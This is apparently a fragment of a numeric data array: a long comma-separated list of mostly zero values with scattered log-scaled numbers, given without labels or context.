0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0,\n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 3.6635616461296467, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0, 0.0, \n 1.9459101490553132, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.995732273553991, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.0794415416798357, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, \n 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, \n 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.871201010907891, 3.2188758248682006, 0, \n 1.6094379124341003, 0.0, 0.0, 0, 0.0, 5.0301047650807, \n 4.605170185988092, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, \n 2.302585092994046, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 5.101797476893978, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 3.2188758248682006, 0.0, \n 3.6375861597263857, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.8501476017100584, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 4.394449154672439,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.77912349311153,\n 1.3862943611198906, 0.0, 0, 1.791759469228055, 0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.6375861597263857, 0.0, 4.394449154672439, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0.0, 0.0, 0,\n 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 2.5649493574615367, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 12.332621592519935, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, \n 2.4849066497880004, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, \n 1.0986122886681098, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.9459101490553132, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.06534854782536, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 3.7612001156935624, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.7376696182833684, 0.0, 0.0, 0.0, \n 5.390770307485499, 0.0, 0.0, 0.0, 0, 0, 0.0, 3.0841946160253872, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, \n 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 1.3862943611198906, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.9459101490553132, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 